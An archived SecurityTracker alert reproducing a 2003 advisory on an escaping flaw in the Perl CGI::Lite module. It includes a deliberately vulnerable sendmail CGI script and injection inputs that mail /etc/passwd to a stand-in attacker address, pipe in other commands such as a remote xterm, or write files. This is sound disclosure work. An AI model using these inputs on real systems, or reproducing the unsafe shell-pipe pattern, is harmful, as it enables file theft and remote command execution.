SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   CGI Lite Vendors:   Gundavaram, Shishir et al
CGI::Lite Input Validation Hole May Disclose Files or Grant Shell Access to Remote Users
SecurityTracker Alert ID:  1006080
SecurityTracker URL:  http://securitytracker.com/id/1006080
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 11 2003
Impact:   Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Version(s): 2.0 and prior
Description:   An input validation vulnerability was reported in CGI::Lite. A remote user can submit specially crafted input to bypass the code's security filtering mechanisms.

It is reported that there is a flaw in the escape_dangerous_chars() function. Some critical meta characters may not be properly escaped.

A CGI script that invokes the CGI::Lite escape_dangerous_chars() function may be vulnerable. A remote user could supply specially crafted user input to pass critical characters to the operating system. A remote user may be able to gain read or write access to files on the target server, depending on the CGI application. A remote user may also be able to execute arbitrary shell commands on the target server with the privileges of the web daemon, depending on the CGI application.

The function reportedly fails to escape the following characters:

\ - backslash
? - question mark
~ - tilde
^ - carat
\n - newline
\r - carriage return

The vendor (maintainer) has reportedly been notified.

Impact:   A remote user may be able to gain read or write access to files on the target server. A remote user may also be able to execute arbitrary shell commands on the target server with the privileges of the web daemon. The specific impact depends on the CGI application using the vulnerable CGI::Lite function.
Solution:   No solution was available at the time of this entry.
Vendor URL:  search.cpan.org/author/BENL/CGI-Lite-2.0/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based; Linux/UNIX confirmed to be affected; Windows not confirmed

Message History:   None.


 Source Message Contents

Subject:  Security bug in CGI::Lite::escape_dangerous_chars() function



SUBJECT
	Security bug in CGI::Lite::escape_dangerous_chars() function, part
	of the CGI::Lite 2.0 package, and earlier revisions thereof.

SUMMARY
	The CGI::Lite::escape_dangerous_chars() function fails to escape
	the entire set of special characters that may have significance
	to the underlying shell command processor.  When the function is
	used from within a web CGI script which processes arbitrary user
	input from some HTML form, an attacker may be able to read and/or
	write some or all local files and may be able to obtain shell-
	level access to the attacked web server.

SCOPE
	Any and all UNIX and/or Linux systems which incorporate the Perl
	CGI::Lite module, or onto which this module has been installed.

	It appears likely that any/all MS Windows systems onto which the
	Perl CGI::Lite module has been installed may also be affected,
	however the author of this advisory HAS NOT verified that.

IMPACT
	If the CGI::Lite::escape_dangerous_chars() function is used within
	(for example) a web CGI script, a remote attacker may be able to
	read and/or write local files on the attacked web server and/or
	may be able to gain shell-level access to the attacked web server,
	via the CGI script, as the user-id under which the CGI script is
	executed (typically, but not always the `nobody' user).

	The potential exists for remote root compromise (or other privileged
	access) if a CGI script using CGI::Lite::escape_dangerous_chars() is
	installed as set-uid (root) or set-gid.

DISCUSSION
	Although poorly documented, the CGI::Lite::escape_dangerous_chars()
	function appears to be a function whose purpose is to modify an
	input character string in a way so that ``dangerous'' characters
	which might otherwise have special significance to an underlying
	shell command processor will each be preceded by a backslash
	(escape) character in the resulting output string.  The intent is
	clearly to convert possibly dangerous user input strings into
	benign forms that, when provided as command line arguments to an
	underlying shell command processor, will not have any undesirable
	and/or unanticipated effects.  (The classical example is the semi-
	colon character, which acts as a command separator for most UNIX
	and/or Linux shell command processors.)

	It is reasonable to believe that CGI::Lite::escape_dangerous_chars()
	has, in all probability, been used for exactly this purpose (i.e.
	rendering user input strings ``harmless'' in advance of their being
	provided, as arguments, to an underlying shell processor) in many
	existing Perl CGI scripts.

	Unfortunately, CGI::Lite::escape_dangerous_chars() fails to escape
	many of the characters mentioned as possibly dangerous characters
	in the WWW security FAQ (Question 7), specifically:

		\  -  backslash
		?  -  question mark
		~  -  tilde
		^  -  carat
		\n -  newline
		\r -  carriage return

	Note that all or most of these character _do_ in fact have special
	meaning, when presented as parts of command line arguments to
	various UNIX and/or Linux shell command processors (and, I suspect,
	probably MS Windows shell command line processors also).

	Below is a trivially simple example of how this security flaw can
	cause a problem, in practice:

	=====================================================================
	#!/usr/bin/perl -w

	use strict;
	use CGI::Lite;

	my $cgi = new CGI::Lite;
	my %form = $cgi->parse_form_data;
	my $recipient = $form{'recipient'};

	my $message = "From: sender\nSubject: Hello\n\nHello my friend!\n\n";

	$recipient = escape_dangerous_chars ($recipient);

	open (SM, "|/usr/sbin/sendmail -f rfg $recipient");
	print SM $message;
	close SM;

	print "Content-Type: text/html\n\n";
	print "<HTML>\n";
	print "<HEAD></HEAD>\n";
	print "<BODY>\n";
	print "Thank you.  Your request has been processed\n";
	print "</BODY>\n";
	print "</HTML>\n";
	=====================================================================

	The Perl CGI script above might be constructed to act as the back-end
	(CGI) handler for a simple web page that allows a web visitor to enter
	his/her e-mail address into a text field on the form, and thereby
	trigger the automated sending of some pre-canned (or dynamically
	computed) e-mail message to the user-supplied e-mail address.
	
	Note that the escape_dangerous_chars function is used to ``sanitize''
	the user-supplied input string before it is used as an argument to
	the Perl open function.

	Unfortunately, the fact that escape_dangerous_chars fails to properly
	backslash-escape any backslash characters contained in its input string
	has very serious security consequences for the simple CGI script shown
	above.  Consider what would happen if a web visitor entered the string:

	attacker@example.com \</etc/passwd
	
	Note that after escape_dangerous_chars is applied to this user input,
	the resulting string will be
	
	attacker@example.com \\</etc/passwd
	
	and that exact string will be passed to the underlying shell command
	processor via the Perl open call.

	The unfortunate result of this sequence of events would be that a
	copy of the local password file would be e-mailed, both to
	<attacker@example.com> and also to the (almost certainly non-existent)
	local user whose user-id is a single backslash character.  (Most
	UNIX/Linux shells will see the \\ as a single backslash-escaped
	backslash character.  That single backslash character will then
	be treated as being just another member of the list of destination
	e-mail addresses for the outgoing e-mail message by sendmail.)
	
	In this example, the account, if any, to which e-mail addresses to the
	(non-existent?) local user-id '\' is directed will vary, depending
	upon whether one is using ``real'' Sendmail or, as I do, a mostly
	compatible Sendmail clone (Postfix).  It may also depend, of course,
	on how exactly the local mail server has been configured.  E-mail
	sent to the local user '\' may in some cases be automatically re-
	directed to the `nobody' account, which is to say to /dev/null, in
	which case no local user or administrator would have any idea that
	anything untoward or undesirable had even taken place.

	Regardless of where the _second_ copy of the e-mail message goes
	however, the damage has already been done... <attacker@example.com>
	_will_ be e-mailed a copy of the local password file... or any other
	attacker-selected file residing on the exploited system.
	
	Other similar (but perhaps even more damaging) kinds of exploits are
	also possible, for example:
	
	attacker@example.com\|other-command
	
	or perhaps:
	
	attacker@example.com\;other-command
	
	where `other-command' is `xterm' followed by a set of arguments needed
	to start up a remotely-accessible xterm window.  Also, depending on
	permissions, local files on the exploited machine could be created or
	overwritten, e.g. via:
	
	attacker@example.com\>/tmp/new-file
	attacker@example.com\>/tmp/unprotected-file
	
CONCLUSION
	It is clear that CGI::Lite::escape_dangerous_chars fails to properly
	backslash-escape backslash characters themselves, and other characters
	that may have special significance to the underlying shell command
	processor, when such characters are present in the input string.

	It is also clear that this failure can lead, and probably already
	has led, in many cases, to trivially-exploitable CGI scripts via
	which remote attackers can read files, write files, create files,
	and probably even obtain a remote shell access on the exploited
	target system(s).
	
	Note that that even if a CGI script using escape_dangerous_chars goes
	to the additional trouble of deleting all whitespace characters from
	user-supplied HTML form text field values (e.g. via s/\s//g) in ad-
	dition to applying escape_dangerous_chars to sanitize the input, the
	elimination of whitespace characters is quite definitely NOT sufficient
	to prevent all possible exploits, as illustrated in the examples above.

FIX
	One possible fix for this problem is simple and obvious. The
	escape_dangerous_chars could be hacked to include, in the set of
	characters that it will escape, the backslash character and other
	special characters from the complete set of ``dangerous'' characters
	as documented in the WWW Security FAQ.  (A patch which effects this
	change is available from the author of this advisory upon request.)

	The advisability of this specific ``quick and dirty'' fix has been
	questioned by multiple parties however.  (Some say that it would
	better to list the set of characters which are safe to NOT escape,
	and then just have the function escape every character that is NOT
	in that ``safe'' character set.)

ADVISORY AUTHOR
	Ronald F. Guilmette <rfg@monkeys.com>

ADVISIORY DATE
	February 11, 2003

DISCLOSURE HISTORY
	Multiple attempts were made to advise both the current maintainer of
	the CGI::Lite module (b.d.low@ieee.org) and also the administrator
	of the CPAN Perl archive web site (cpan@perl.org) beginning on
	January 10th, 2003, regarding this security bug/issue.  To the
	present date, no response of any kind was received from ether party.

	CERT (cerg.org) was advised of the details of this security issue
	on January 22nd, 2003, and responded that they would notify and
	canvas their affiliated software vendors on this issue.  As of
	this writing, CERT has not provided any indication that any of
	their affiliated software vendors are affected by this issue.

	<security@redhat.com> was also notified in January 22nd, 2003.
	A representative of RedHat responded that RedHat is not affected
	by this security issue, but promised to notify other relevant
	software vendors of this issue.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC